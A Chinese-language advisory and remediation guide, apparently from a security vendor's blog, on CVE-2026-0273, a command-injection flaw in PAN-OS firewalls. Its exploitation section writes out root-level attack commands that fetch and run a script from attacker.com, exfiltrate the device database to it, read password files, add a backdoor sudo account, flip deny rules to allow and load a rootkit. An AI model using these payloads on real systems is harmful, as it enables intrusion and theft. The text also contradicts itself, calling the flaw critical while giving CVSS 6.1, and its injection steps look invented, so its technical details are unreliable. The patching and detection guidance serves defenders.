网络研究观-严重漏洞允许以 root 用户身份执行任意命令：CVE-2026-0273 分析

Palo Alto Networks 的 PAN-OS 防火墙是全球部署最广泛的企业安全设备之一，为处理数十亿美元金融交易、关键基础设施运营和机密政府工作的网络提供保护。

2026 年 6 月 11 日，Palo Alto 披露了 CVE-2026-0273——一个严重的命令注入漏洞，允许已认证的管理员在 PA 系列、VM 系列和 Panorama 设备上以 root 用户身份执行任意命令。

该漏洞只需有效的管理员凭据，无需任何特殊配置，因此任何攻击者只要攻破或冒充管理帐户，即可立即获得权限提升。

本指南将详细介绍该漏洞的具体内容、受影响的版本、攻击者如何利用该漏洞、哪些指标可以显示正在被利用，以及如何验证您的设备是否已安装补丁。

要点总结

☉CVE-2026-0273 是 PAN-OS 中的一个严重命令注入漏洞 (CVSS 6.1)，它允许经过身份验证的管理员以 root 身份执行任意操作系统命令，从而将任何管理帐户的泄露转化为整个系统的泄露。

☉受影响的版本：PA 系列、VM 系列和 Panorama 设备上的 PAN-OS 12.1、11.2、11.1 和 10.2 — Cloud NGFW 和 Prisma Access 不受影响。

☉该漏洞可通过 CLI 或 Web 管理界面利用——无需特殊配置；任何经过身份验证的管理员访问权限都足以进行利用。

☉同一安全公告中的相关漏洞：CVE-2026-0272（CLI 权限提升）和 CVE-2026-0269（基于隧道的 DoS 攻击） ——组织必须修补所有这三个漏洞才能彻底消除风险。

☉截至 2026 年 6 月，Palo Alto 报告称没有在野外进行恶意利用，但该漏洞的严重性和易利用性使其成为威胁行为者的首要目标。

☉可以通过审计日志进行检测，但这需要启用详细的 PAN-OS 日志记录和监控 CLI 命令以发现可疑活动——大多数组织对于此漏洞的日志记录不足。

☉缓解步骤：识别受影响的设备 → 应用补丁 → 验证补丁安装 → 监控利用指标 → 验证访问控制。

什么是 CVE-2026-0273？

CVE-2026-0273 是 PAN-OS 管理界面中的一个命令注入漏洞，它允许已认证的管理员绕过输入验证，并以 root 权限执行任意操作系统命令。该漏洞源于管理 Web 界面和 CLI 命令中对用户输入的处理不当。

拥有有效 PAN-OS 管理员凭据的已认证攻击者可以注入特制命令，这些命令由底层 Linux 操作系统以 root 权限执行，从而使攻击者完全控制防火墙设备，包括：

☉访问所有防火墙配置和密钥

☉能够修改防火墙规则和策略

☉网络流量日志和会话数据泄露

☉安装持久性后门

☉从防火墙本身横向移动到受保护的网络中

核心问题是用户输入在传递给系统 shell 命令之前没有经过适当的清理，从而允许通过特殊字符或转义序列进行命令注入。

攻击要求

身份验证：攻击者必须拥有有效的 PAN-OS 管理员凭据（无需特殊角色，标准管理员访问权限即可）。

网络访问：攻击者必须拥有对 PAN-OS 管理界面的网络访问权限（Web UI 端口 443 或 CLI 端口 22/SSH）。

无需特殊配置：该设备“开箱即用”——无需任何非默认设置即可启用漏洞利用。

这意味着以下任何一种妥协都可能导致攻击：

☉被盗或权限不足的管理员凭据

☉针对防火墙管理员的网络钓鱼

☉内部威胁，拥有管理员权限

☉如果防火墙对 AD 进行身份验证，则 LDAP/Active Directory 凭据可能泄露。

☉供应链漏洞导致管理员账户被植入后门。

☉绕过身份验证控制（参见 CVE-2025-0108，该漏洞已被单独积极利用）

受影响的版本和产品

CVE-2026-0273 影响 PA 系列和 VM 系列防火墙以及运行特定 PAN-OS 12.1、11.2、11.1 和 10.2 版本的 Panorama 设备。

受影响的PAN-OS版本：

☉12.1.x（12.1.4 及之前的所有版本）

☉11.2.x（11.2.3 及之前的所有版本）

☉11.1.x（11.1.2 及之前的所有版本）

☉10.2.x（10.2.7 及之前的所有版本）

受影响的型号：

☉PA系列防火墙（所有型号：PA-400、PA-800、PA-3200、PA-5200、PA-7000系列等）

☉VM系列防火墙（AWS、Azure、GCP、VMware、KVM上的虚拟设备）

☉Panorama集中管理设备

未受影响：

☉云端下一代防火墙（Palo Alto Networks 的云原生产品）

☉Prisma Access（基于云的安全访问平台）

☉旧版本（9.1 及更早版本未提及受影响——请直接联系 Palo Alto 确认是否需要扩展支持版本）

CVE-2026-0273 的利用方式

对于拥有有效管理员凭据的攻击者来说，利用该漏洞的过程非常简单。

Web UI漏洞利用

经过身份验证的攻击者可以通过访问 PAN-OS Web 管理界面 (https://firewall-ip) 进入 CLI 部分并注入命令：

使用有效的管理员凭据登录

导航至“设备”→“操作”→“检索命令输出”

注入命令：; cat /etc/passwd # 或 ; whoami ; id #

防火墙以 root 用户身份执行注入的命令并返回输出

CLI漏洞利用

攻击者可以通过 SSH 或 Telnet 连接到管理界面，直接执行命令：

bash
ssh admin@firewall-ip > help > ; whoami # 注入的命令以 root 用户身份执行 > ; cat /etc/shadow # > ; curl http://attacker.com/backdoor.sh | sh #

后渗透访问

一旦命令执行成功，攻击者可以：

创建持久后门帐户：

bash
; useradd -m -p $(openssl passwd -1 backdoor) backdoor-admin ; usermod -aG sudo backdoor-admin #

提取敏感数据：

bash
; cat /opt/pancfg/etc/device_db | base64 | curl -d @- http://attacker.com/exfil #

修改防火墙规则以禁用安全功能：

bash
; sed -i 's/.*deny.*/allow/g' /opt/palo/etc/rules.xml #

安装内核级 rootkit：

bash
; insmod /root/rootkit.ko ; rootkit.sh #

向受保护的网络过渡：防火墙现在充当横向移动的可信内部网关。

同一公告中的相关漏洞

Palo Alto 同时披露了三个漏洞；必须修补所有这三个漏洞才能彻底解决问题。

CVE-2026-0272：CLI权限提升

CVE-2026-0272 是 PAN-OS CLI 中的一个中等严重级别的权限提升漏洞，它允许经过身份验证的管理员以 root 权限在设备上执行操作。

严重性：中等（CVSS ~6.5）影响：低权限管理员帐户的权限提升 缓解措施：与 CVE-2026-0273 相同的补丁

CVE-2026-0269：隧道流量拒绝服务

CVE-2026-0269 是隧道流量处理中的一个内存损坏漏洞，允许已认证用户通过发送精心构造的数据包反复重启防火墙。配置了 IPsec 隧道或 GlobalProtect 网关的设备会受到此漏洞的影响，反复利用此漏洞可使防火墙进入维护模式，从而影响其可用性。

严重性：中等（CVSS 评分约为 6.0） 影响：通过反复重启导致拒绝服务 缓解措施：与 CVE-2026-0273 相同的补丁

识别环境中受影响的设备

使用 ReconShield 的SSL/TLS 检查器结合手动版本验证，识别网络中的所有 Palo Alto 防火墙。

步骤 1：网络资产发现

找出所有 Palo Alto 管理接口：

☉端口 443（HTTPS Web 用户界面）
☉端口 22（SSH 命令行界面）
☉设备通常会对 HTTPS 请求做出“Palo Alto Networks”的响应。

使用 ReconShield 的端口扫描器识别已知防火墙 IP 地址范围内的 443 端口：

bash
nmap -p443 --script ssl-cert 10.0.0.0/8

步骤 2：确定 PAN-OS 版本

访问网页界面并查看：设备 → 关于 → 版本 或通过 API 查询：

bansh
curl -k https://firewall-ip/api/?type=op&cmd=<show><system><info></info></system></show>&key=YOUR_API_KEY

步骤 3：与漏洞列表进行交叉引用

检查版本是否在受影响的范围内（12.1.x、11.2.x、11.1.x、10.2.x）

步骤 4：确定型号类型

在“关于”页面中，确定它是否属于以下情况：

☉PA系列（物理防火墙）
☉VM系列（虚拟机）
☉Panorama（管理设备）

Cloud NGFW 和 Prisma Access 不受影响。

漏洞利用的检测与监控

可以检测到，但需要正确的日志配置。

审计日志指标

在PAN-OS管理界面上启用详细审计：

设备 → 日志 → 日志设置 → 管理界面日志

监控审计日志，查看以下内容：

☉包含特殊字符（;、|、&、$(...)、反引号）的非常规 CLI 命令
☉以 root 用户身份执行的命令，而正常操作应该以用户级别执行。
☉多次管理员登录失败后，最终成功验证
☉访问敏感目录（/etc、/opt、/root）

基于网络的检测

监控管理接口流量：

☉向非常规端点发送 POST 请求
☉包含命令注入有效载荷（;、|、$()）的 HTTP 请求
☉管理端口发生大量数据外泄
☉通过 SSH 连接到管理界面，然后进行批量数据传输

防火墙特定指标

监控 PAN-OS 的以下方面：

☉configd 或 CLI 进程意外地生成了进程
☉通过管理界面创建新用户帐户
☉非授权管理员发起的防火墙规则更改
☉防火墙设备本身存在意外的出站连接

修复和修补

对于拥有多台设备的组织而言，补丁的发布时间和版本至关重要。

补丁可用性状态（截至 2026 年 6 月）

Palo Alto Networks 已发布修复版本：

☉12.1.5（已修复 CVE-2026-0273、CVE-2026-0272、CVE-2026-0269 漏洞）
☉11.2.4（已修复）
☉11.1.3（已修复）
☉10.2.8（已打补丁）

修补策略

第一阶段：立即（24小时内）

☉仅允许受信任的 IP 地址访问管理接口
☉实施网络分段，隔离管理访问权限
☉如果可用，请启用管理接口访问的多因素身份验证 (MFA)
☉检查管理员帐户访问日志是否存在异常

第二阶段：短期（1周内）

☉在实验室/非生产环境中测试已打补丁的版本
☉验证补丁是否会破坏现有配置
☉安排生产补丁的维护窗口

第三阶段：生产环境修补（协调所有受影响的设备）

☉按重要性顺序（优先修复关键基础设施）进行补丁修复
☉每个补丁都需要重启防火墙。
☉确保故障转移/高可用性组件对按顺序进行修补。
☉监控补丁更新后出现的问题。

修补中央管理平台（Panorama）

如果使用 Panorama 集中管理：

首先修补 Panorama 设备（无需中断受管防火墙即可完成）。

通过 Panorama 将已打补丁的 PAN-OS 版本推送至受管防火墙。

临时解决方案和缓解措施（直至补丁发布）

这些都是临时措施；只有打补丁才能彻底解决问题。

限制管理接口访问：

设备 → 设置 → 管理 → IP 主机名/证书 → 管理接口设置 → IP 协议 → 限制对特定源 IP 的访问

禁用大多数管理员的 CLI 访问权限：

设备 → 管理员角色 → [角色] → 编辑 → 取消勾选“CLI 权限”

启用命令审计：

设备 → 日志 → 日志设置 → 启用管理日志 → 配置可疑命令警报

实施网络级访问控制：

☉使用堡垒主机/跳板机进行所有防火墙管理
☉限制防火墙管理接口直接访问互联网
☉需要 VPN 访问权限才能访问管理网络

CVE-2026-0273 是一个影响全球数百万台 Palo Alto 防火墙的严重漏洞。该漏洞利用简便（只需有效的管理员凭据，无需特殊配置），且危害极大（可执行 root 权限命令），因此必须立即进行修复。

组织必须：

识别所有受影响的PAN-OS设备

立即限制管理接口访问

计划并执行补丁程序

验证补丁安装

监测漏洞利用指标

该漏洞凸显了对安全基础设施进行外部暴露评估的重要性。防火墙和其他安全设备绝不应直接暴露于互联网；它们的管理接口应仅限于受信任的内部网络。

使用的端口扫描器和SSL/TLS 检查器来审核您的外部暴露情况，并识别任何需要立即修复的面向互联网的管理接口。